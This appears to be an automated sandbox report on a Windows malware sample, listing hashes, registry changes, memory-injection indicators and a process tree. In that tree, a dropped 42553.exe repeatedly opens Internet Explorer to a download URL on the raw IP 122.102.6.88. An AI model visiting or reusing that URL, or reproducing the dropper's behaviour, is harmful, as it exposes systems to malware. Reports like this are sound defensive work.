79d0f68fb7cf00324e00d39a7c0607b61df5d9638632e1a0e7c1b60c57d73d81

Analysis

max time kernel
148s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
08/07/2024, 16:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe
Size

17KB
MD5

2d07d123f68266e890b50eeaff8ca0ff
SHA1

e8a61e2fede241bcbe20239f621daa7616120deb
SHA256

79d0f68fb7cf00324e00d39a7c0607b61df5d9638632e1a0e7c1b60c57d73d81
SHA512

ddd351bd97183b69db5881d76d5feb295fc70b8217aac78c0eeb549eb05cbea803a0ad905d79bb68cb96f806851b2d80f2bdefd8cbd0f5a8f272fa50f05d834f
SSDEEP

384:VrRei0LuUa99VY1WUZWXOEyma+y6mIU3i76HW4NWPxqdq:VrRkuUaFXU9EfaZPS76WlJq

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4392	42553.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\42553.exe	2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 43 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B6336875-3D89-11EF-A824-7A21B4CEDB13} = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A96C6F8E-3D89-11EF-A824-7A21B4CEDB13} = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{AFCFD840-3D89-11EF-A824-7A21B4CEDB13} = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A0E256D4-3D89-11EF-A824-7A21B4CEDB13} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3572	2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe
4392	42553.exe
4452	IEXPLORE.EXE
4452	IEXPLORE.EXE
3480	IEXPLORE.EXE
3480	IEXPLORE.EXE
244	IEXPLORE.EXE
244	IEXPLORE.EXE
3856	IEXPLORE.EXE
3856	IEXPLORE.EXE
4372	IEXPLORE.EXE
4372	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 3572 wrote to memory of 4392	3572	2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe	85
PID 3572 wrote to memory of 4392	3572	2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe	85
PID 3572 wrote to memory of 4392	3572	2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe	85
PID 4392 wrote to memory of 4452	4392	42553.exe	86
PID 4392 wrote to memory of 4452	4392	42553.exe	86
PID 4452 wrote to memory of 4464	4452	IEXPLORE.EXE	87
PID 4452 wrote to memory of 4464	4452	IEXPLORE.EXE	87
PID 4452 wrote to memory of 4464	4452	IEXPLORE.EXE	87
PID 4392 wrote to memory of 3480	4392	42553.exe	88
PID 4392 wrote to memory of 3480	4392	42553.exe	88
PID 3480 wrote to memory of 1436	3480	IEXPLORE.EXE	89
PID 3480 wrote to memory of 1436	3480	IEXPLORE.EXE	89
PID 3480 wrote to memory of 1436	3480	IEXPLORE.EXE	89
PID 4392 wrote to memory of 244	4392	42553.exe	90
PID 4392 wrote to memory of 244	4392	42553.exe	90
PID 244 wrote to memory of 364	244	IEXPLORE.EXE	91
PID 244 wrote to memory of 364	244	IEXPLORE.EXE	91
PID 244 wrote to memory of 364	244	IEXPLORE.EXE	91
PID 4392 wrote to memory of 3856	4392	42553.exe	94
PID 4392 wrote to memory of 3856	4392	42553.exe	94
PID 3856 wrote to memory of 4372	3856	IEXPLORE.EXE	95
PID 3856 wrote to memory of 4372	3856	IEXPLORE.EXE	95
PID 3856 wrote to memory of 4372	3856	IEXPLORE.EXE	95

C:\Users\Admin\AppData\Local\Temp\2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2d07d123f68266e890b50eeaff8ca0ff_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Windows\42553.exe
  C:\Windows\42553.exe -r
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down5/down/?s=C0BDD09EAFE8B2E9B5D4B4E982B5BAB7&t=7/9/2024 12:24:39 AM&v=C1D3B8E3B1B191EAB3BEC0AD&n=C6AEE7C3B7B4ABB7BDB0CCAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4452 CREDAT:17410 /prefetch:2
      4⤵
      PID:4464
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down5/down/?s=C0BDD09EAFE8B2E9B5D4B4E982B5BAB7&t=7/9/2024 12:24:54 AM&v=C1D3B8E3B1B191EAB3BEC0AD&n=C6AEE7C3B7B4ABB7BDB0CCAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3480
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3480 CREDAT:17410 /prefetch:2
      4⤵
      PID:1436
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down5/down/?s=C0BDD09EAFE8B2E9B5D4B4E982B5BAB7&t=7/9/2024 12:25:05 AM&v=C1D3B8E3B1B191EAB3BEC0AD&n=C6AEE7C3B7B4ABB7BDB0CCAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:244
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:244 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      PID:364
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down5/down/?s=C0BDD09EAFE8B2E9B5D4B4E982B5BAB7&t=7/9/2024 12:25:15 AM&v=C1D3B8E3B1B191EAB3BEC0AD&n=C6AEE7C3B7B4ABB7BDB0CCAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3856
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3856 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:4372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A0E256D4-3D89-11EF-A824-7A21B4CEDB13}.dat

Filesize
4KB

MD5
d8522df85eec146f22e2fc92480767c1

SHA1
03738ed840f79fc9dabdf445ee3b0887c3874c7a

SHA256
f0359a7c79d8b07cd0da163ef5d94ae7a3334d26a16af23ea9cdec56ae81a8a5

SHA512
6ef86309e9b7ffc4c5ef70c28a9ab223a5d1de1324d36de35872e1bcf5b9cf6576d18b803cb0a219f99018010cf22c251558e6db2336a4ce0459545fea12f5be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A96C6F8E-3D89-11EF-A824-7A21B4CEDB13}.dat

Filesize
5KB

MD5
5558c2e041e35df9aeee580f8d672969

SHA1
5449537df993959627d99c82de8ea452e805e566

SHA256
55e991eb910dfae74d07e9ecd560c5051c0933e4aac63591bcdc18075b7c54cb

SHA512
b30ef1cb83e4df7ed375d026bdc720dc217c8ff9fcb2fb766acc1acbd2e06731bcee612bf23c79ef6c1174d27e05f7b639b393f50f0ea5cf1eef1c58a131e4fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AFCFD840-3D89-11EF-A824-7A21B4CEDB13}.dat

Filesize
5KB

MD5
60e2c2f092758ac3e057959f00414761

SHA1
c237bbdc739022fcb6f8549ee944c55c4cadd3fc

SHA256
0203518b648d67e9f5e9508a8d4adfeaf5248951509ac3a7465f8a84dd3004c5

SHA512
a8f17b37de91594a0e7573720801aeb4b495f1f854f49c21d565ba5ac20e0b231ffd96c4dbbd02a78c8f95592906e743d5f0b4503cab15bd40d16d57db89e25c

Download Submit
C:\Windows\42553.exe

Filesize
17KB

MD5
2d07d123f68266e890b50eeaff8ca0ff

SHA1
e8a61e2fede241bcbe20239f621daa7616120deb

SHA256
79d0f68fb7cf00324e00d39a7c0607b61df5d9638632e1a0e7c1b60c57d73d81

SHA512
ddd351bd97183b69db5881d76d5feb295fc70b8217aac78c0eeb549eb05cbea803a0ad905d79bb68cb96f806851b2d80f2bdefd8cbd0f5a8f272fa50f05d834f

Download Submit
memory/3572-1-0x00000000001C0000-0x00000000001C2000-memory.dmp

Filesize
8KB

Download
memory/3572-0-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3572-13-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4392-10-0x00000000001C0000-0x00000000001C2000-memory.dmp

Filesize
8KB

Download
memory/4392-16-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4392-14-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4392-18-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4392-9-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4392-20-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4392-21-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download